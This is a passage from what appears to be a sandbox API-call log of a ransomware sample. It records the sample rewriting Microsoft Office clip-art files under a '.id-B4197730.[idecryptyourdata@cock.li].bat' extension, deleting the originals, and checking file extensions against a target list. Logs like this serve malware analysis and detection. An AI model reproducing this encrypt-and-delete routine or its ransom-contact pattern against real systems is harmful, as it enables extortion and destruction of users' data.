lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0062.157] SetEndOfFile (hFile=0x340) returned 1 [0062.157] CloseHandle (hObject=0x340) returned 1 [0062.158] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.158] SetEndOfFile (hFile=0x344) returned 1 [0062.159] CloseHandle (hObject=0x344) returned 1 [0062.159] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.160] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04117_.wmf")) returned 1 [0062.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 68 [0062.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 68 [0062.160] lstrlenW (lpString=".doc") returned 4 [0062.160] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.160] lstrlenW (lpString=".docx") returned 5 [0062.160] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.160] lstrlenW (lpString=".pdf") returned 4 [0062.160] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.160] lstrlenW (lpString=".xls") returned 4 [0062.160] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.160] lstrlenW (lpString=".xlsx") returned 5 [0062.160] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.160] lstrlenW (lpString=".ppt") returned 4 [0062.160] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 68 [0062.161] lstrlenW (lpString=".zip") returned 4 [0062.161] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.161] lstrlenW (lpString=".rar") returned 4 [0062.161] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.161] lstrlenW (lpString=".bz2") returned 4 [0062.161] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.161] lstrlenW (lpString=".7z") returned 3 [0062.161] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 68 [0062.161] lstrlenW (lpString=".dbf") returned 4 [0062.161] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 68 [0062.161] lstrlenW (lpString=".1cd") returned 4 [0062.161] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 68 [0062.161] lstrlenW (lpString=".jpg") returned 4 [0062.161] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.162] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.162] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.162] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04191_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0062.162] GetLastError () returned 0x0 [0062.162] ReadFile (in: hFile=0x344, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x19ec, lpOverlapped=0x0) returned 1 [0062.178] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x19f0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x19f0, lpOverlapped=0x0) returned 1 [0062.179] ReadFile (in: hFile=0x344, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0062.179] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0062.179] SetEndOfFile (hFile=0x340) returned 1 [0062.180] CloseHandle (hObject=0x340) returned 1 [0062.180] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.180] SetEndOfFile (hFile=0x344) returned 1 [0062.181] CloseHandle (hObject=0x344) returned 1 [0062.181] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.181] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04191_.wmf")) returned 1 [0062.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 68 [0062.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 68 [0062.182] lstrlenW (lpString=".doc") returned 4 [0062.182] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.182] lstrlenW (lpString=".docx") returned 5 [0062.182] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.182] lstrlenW (lpString=".pdf") returned 4 [0062.182] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.182] lstrlenW (lpString=".xls") returned 4 [0062.182] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.182] lstrlenW (lpString=".xlsx") returned 5 [0062.182] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.182] lstrlenW (lpString=".ppt") returned 4 [0062.182] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 68 [0062.182] lstrlenW (lpString=".zip") returned 4 [0062.182] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.182] lstrlenW (lpString=".rar") returned 4 [0062.182] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.182] lstrlenW (lpString=".bz2") returned 4 [0062.182] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.182] lstrlenW (lpString=".7z") returned 3 [0062.182] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 68 [0062.182] lstrlenW (lpString=".dbf") returned 4 [0062.182] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 68 [0062.182] lstrlenW (lpString=".1cd") returned 4 [0062.183] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 68 [0062.183] lstrlenW (lpString=".jpg") returned 4 [0062.183] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.183] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.183] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.183] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04195_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0062.183] GetLastError () returned 0x0 [0062.183] ReadFile (in: hFile=0x344, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x1204, lpOverlapped=0x0) returned 1 [0062.306] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x1210, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x1210, lpOverlapped=0x0) returned 1 [0062.307] ReadFile (in: hFile=0x344, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0062.307] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0062.307] SetEndOfFile (hFile=0x340) returned 1 [0062.308] CloseHandle (hObject=0x340) returned 1 [0062.308] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.308] SetEndOfFile (hFile=0x344) returned 1 [0062.309] CloseHandle (hObject=0x344) returned 1 [0062.309] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.309] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04195_.wmf")) returned 1 [0062.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 68 [0062.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 68 [0062.310] lstrlenW (lpString=".doc") returned 4 [0062.310] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.310] lstrlenW (lpString=".docx") returned 5 [0062.310] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.310] lstrlenW (lpString=".pdf") returned 4 [0062.310] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.310] lstrlenW (lpString=".xls") returned 4 [0062.310] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.310] lstrlenW (lpString=".xlsx") returned 5 [0062.310] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.310] lstrlenW (lpString=".ppt") returned 4 [0062.310] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 68 [0062.310] lstrlenW (lpString=".zip") returned 4 [0062.310] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.310] lstrlenW (lpString=".rar") returned 4 [0062.310] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.310] lstrlenW (lpString=".bz2") returned 4 [0062.310] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.310] lstrlenW (lpString=".7z") returned 3 [0062.310] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 68 [0062.310] lstrlenW (lpString=".dbf") returned 4 [0062.310] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 68 [0062.310] lstrlenW (lpString=".1cd") returned 4 [0062.311] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 68 [0062.311] lstrlenW (lpString=".jpg") returned 4 [0062.311] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.321] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.321] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.321] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04196_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0062.324] GetLastError () returned 0x0 [0062.324] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xc48, lpOverlapped=0x0) returned 1 [0062.386] WriteFile (in: hFile=0x370, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xc50, lpOverlapped=0x0) returned 1 [0062.387] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0062.387] WriteFile (in: hFile=0x370, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0062.387] SetEndOfFile (hFile=0x370) returned 1 [0062.390] CloseHandle (hObject=0x370) returned 1 [0062.393] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.393] SetEndOfFile (hFile=0x354) returned 1 [0062.395] CloseHandle (hObject=0x354) returned 1 [0062.396] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.397] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04196_.wmf")) returned 1 [0062.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 68 [0062.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 68 [0062.397] lstrlenW (lpString=".doc") returned 4 [0062.397] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.397] lstrlenW (lpString=".docx") returned 5 [0062.397] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.397] lstrlenW (lpString=".pdf") returned 4 [0062.397] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.397] lstrlenW (lpString=".xls") returned 4 [0062.397] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.397] lstrlenW (lpString=".xlsx") returned 5 [0062.397] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.397] lstrlenW (lpString=".ppt") returned 4 [0062.398] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 68 [0062.398] lstrlenW (lpString=".zip") returned 4 [0062.398] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.398] lstrlenW (lpString=".rar") returned 4 [0062.398] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.398] lstrlenW (lpString=".bz2") returned 4 [0062.398] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.398] lstrlenW (lpString=".7z") returned 3 [0062.398] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 68 [0062.398] lstrlenW (lpString=".dbf") returned 4 [0062.398] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 68 [0062.398] lstrlenW (lpString=".1cd") returned 4 [0062.398] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 68 [0062.398] lstrlenW (lpString=".jpg") returned 4 [0062.398] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.398] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.399] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04269_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0062.399] GetLastError () returned 0x0 [0062.399] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x7e0, lpOverlapped=0x0) returned 1 [0062.497] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x7f0, lpOverlapped=0x0) returned 1 [0062.498] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0062.498] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0062.498] SetEndOfFile (hFile=0x340) returned 1 [0062.498] CloseHandle (hObject=0x340) returned 1 [0062.499] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.499] SetEndOfFile (hFile=0x368) returned 1 [0062.500] CloseHandle (hObject=0x368) returned 1 [0062.500] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.500] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04269_.wmf")) returned 1 [0062.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 68 [0062.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 68 [0062.501] lstrlenW (lpString=".doc") returned 4 [0062.501] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.501] lstrlenW (lpString=".docx") returned 5 [0062.501] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.501] lstrlenW (lpString=".pdf") returned 4 [0062.501] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.501] lstrlenW (lpString=".xls") returned 4 [0062.501] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.501] lstrlenW (lpString=".xlsx") returned 5 [0062.501] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.501] lstrlenW (lpString=".ppt") returned 4 [0062.501] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 68 [0062.501] lstrlenW (lpString=".zip") returned 4 [0062.501] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.501] lstrlenW (lpString=".rar") returned 4 [0062.501] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.501] lstrlenW (lpString=".bz2") returned 4 [0062.501] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.501] lstrlenW (lpString=".7z") returned 3 [0062.501] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 68 [0062.501] lstrlenW (lpString=".dbf") returned 4 [0062.501] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 68 [0062.501] lstrlenW (lpString=".1cd") returned 4 [0062.501] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 68 [0062.501] lstrlenW (lpString=".jpg") returned 4 [0062.501] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.502] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.502] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.502] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04332_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0062.502] GetLastError () returned 0x0 [0062.502] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x10c8, lpOverlapped=0x0) returned 1 [0062.517] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x10d0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x10d0, lpOverlapped=0x0) returned 1 [0062.518] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0062.518] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0062.518] SetEndOfFile (hFile=0x340) returned 1 [0062.519] CloseHandle (hObject=0x340) returned 1 [0062.519] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.519] SetEndOfFile (hFile=0x368) returned 1 [0062.521] CloseHandle (hObject=0x368) returned 1 [0062.521] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.521] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04332_.wmf")) returned 1 [0062.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 68 [0062.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 68 [0062.523] lstrlenW (lpString=".doc") returned 4 [0062.523] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.524] lstrlenW (lpString=".docx") returned 5 [0062.524] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.524] lstrlenW (lpString=".pdf") returned 4 [0062.524] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.524] lstrlenW (lpString=".xls") returned 4 [0062.524] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.524] lstrlenW (lpString=".xlsx") returned 5 [0062.524] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.524] lstrlenW (lpString=".ppt") returned 4 [0062.524] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.524] lstrlenW (lpString="C:\\Program Files\\Microsoft 